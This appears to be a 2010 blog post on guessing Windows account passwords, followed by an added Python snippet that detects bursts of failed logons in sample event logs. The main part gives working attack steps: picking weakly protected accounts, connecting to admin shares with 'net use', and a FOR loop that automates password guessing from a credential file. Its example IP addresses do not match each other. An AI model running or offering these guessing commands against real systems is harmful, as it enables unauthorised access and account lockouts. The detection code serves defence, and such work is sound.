Methodology To Guess A Password

>> Thursday 24 June 2010

Many users choose easy-to-remember words when picking a password. This can be an advantage for a hacker who looks for subtle clues. Throughout the enumeration process, the hacker keys in probable words that the account holder might have used. The key points to consider are what is known about the individual, such as character and personal details, and other aspects such as hobbies and special moments. If the account holder is an unknown person, focus on accounts that:
  • Have had the same password for a long time
  • Are weakly protected service accounts
  • Are poorly shared accounts
  • Indicate the user has never logged in
  • Have information in the comment field that might be used to compromise password security.

If such an account is identified, the net use command can be used from the command line to connect:

    net use * \\target_IP\share * /u:name

Next, you are prompted for a password to complete the authentication:

    C:\>net use * \\192.188.13.10\c$ * /u:killerifthy
    Type the password for \\172.20.10.79\c$:
    The command completed successfully

It's not always that easy, so you might have to try multiple times or even consider looping the process. To perform an automated password guess, a simple loop can be constructed using the NT/2000/XP shell. It is based on the standard NET USE syntax. Below are the steps to follow:

1. Create a simple username and password file.
2. Inject the file into the FOR command shown below:

    C:\> FOR /F "tokens=1,2*" %i in (kilerhack.txt) do net use \\target\IPC$ %i /u:%j

Note: Make sure that you identify if there is a password lockout policy. Otherwise, you might inadvertently cause a denial of service (DoS) if you lock out all the users.
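
From the defender's side, the loop above shows up as a burst of failed network logons from one source against several accounts. The following is an added example, not part of the original post, that flags that pattern in constructed sample events; the flattened log format, the threshold and the time window are assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample: Windows Security logon events (4625 = failed logon,
# 4624 = successful logon) flattened to "timestamp event_id source_ip account".
# The flattened format is an assumption; this is not real log data.
SAMPLE = """\
2010-06-24T10:00:01 4625 10.0.0.5 administrator
2010-06-24T10:00:02 4625 10.0.0.5 backup
2010-06-24T10:00:03 4625 10.0.0.5 guest
2010-06-24T10:00:04 4625 10.0.0.5 administrator
2010-06-24T10:00:05 4625 10.0.0.5 svc_sql
2010-06-24T10:00:06 4624 10.0.0.5 svc_sql
2010-06-24T10:07:00 4625 10.0.0.9 alice
2010-06-24T10:45:00 4625 10.0.0.9 alice
"""

def parse(text):
    """Yield (time, event_id, source, account); malformed lines are skipped."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4 or not parts[1].isdigit():
            continue
        try:
            ts = datetime.fromisoformat(parts[0])
        except ValueError:
            continue
        yield ts, int(parts[1]), parts[2], parts[3].lower()

def find_guessing(text, max_failures=5, window=timedelta(minutes=1)):
    """Return {source: sorted accounts} for every source that produced at
    least max_failures failed logons inside one sliding time window."""
    recent = defaultdict(deque)   # source -> (time, account) of recent failures
    flagged = defaultdict(set)
    for ts, event_id, source, account in sorted(parse(text)):
        if event_id != 4625:      # only failed logons count toward the burst
            continue
        q = recent[source]
        q.append((ts, account))
        while ts - q[0][0] > window:   # drop failures older than the window
            q.popleft()
        if len(q) >= max_failures:
            flagged[source].update(acct for _, acct in q)
    return {src: sorted(accts) for src, accts in flagged.items()}

if __name__ == "__main__":
    for src, accts in find_guessing(SAMPLE).items():
        print(f"{src}: repeated failed logons against {', '.join(accts)}")
```

Set `max_failures` below the domain's lockout threshold so the alert fires before accounts start locking out.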
     

     
